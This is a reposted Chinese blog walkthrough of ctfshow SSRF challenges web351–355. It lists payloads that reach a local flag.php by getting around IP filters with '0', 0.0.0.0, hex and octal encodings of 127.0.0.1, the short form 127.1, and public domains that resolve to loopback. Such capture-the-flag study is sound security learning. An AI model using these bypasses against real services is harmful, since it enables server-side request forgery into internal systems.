返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >ctfshow web入门 ssrf web351-355
  • 131
分享到

ctfshow web入门 ssrf web351-355

web3php开发语言网络安全 2023-09-07 13:09:23 131人浏览 薄情痞子
摘要

1.WEB351 尝试访问本机的flag.PHP payload: url=Http://localhost/flag.phpurl=http://127.0.0.1/flag.php 2.web3

1.WEB351

在这里插入图片描述
尝试访问本机的flag.PHP

payload:

url=Http://localhost/flag.phpurl=http://127.0.0.1/flag.php

2.web352

在这里插入图片描述
必须要用http或https,ip没有过滤因为匹配时没加变量,恒为真
payload:

url=http://127.0.0.1/flag.phpurl=http://localhost/flag.php

3.web352

在这里插入图片描述
必须要用http或https,过滤了127.0.,只要匹配到了127.0.就不能继续执行了
windows 0代表0.0.0.0
linux 0代表 127.0.0.1
可以用0代替127.0.0.1
payload:

url=http://0/flag.php                #特殊0绕过url=http://0.0.0.0/flag.php     #特殊0绕过url=url=http://0x7F000001/flag.php   #进制绕过http://0177.0.0.1/flag.php                   #进制绕过http://127.1/flag.php                 #简写绕过

4.web354

在这里插入图片描述
过滤了0和1,可以把域名解析到127.0.0.1
http://safe.taobao.com/
http://114.taobao.com/
http://wifi.aliyun.com/
http://imis.qq.com/
http://localhost.sec.qq.com/
http://ecd.tencent.com/
http://sudo.cc/

url=http://sudo.cc/flag.php   

5.web355

在这里插入图片描述
对ip长度做了限制
payload:

url=http://0/flag.phpurl=http://127.1/flag.php

参考文章:
ssrf

来源地址:https://blog.csdn.net/m0_62207170/article/details/130574168

--结束END--

本文标题: ctfshow web入门 ssrf web351-355

本文链接: https://lsjlt.com/news/398250.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作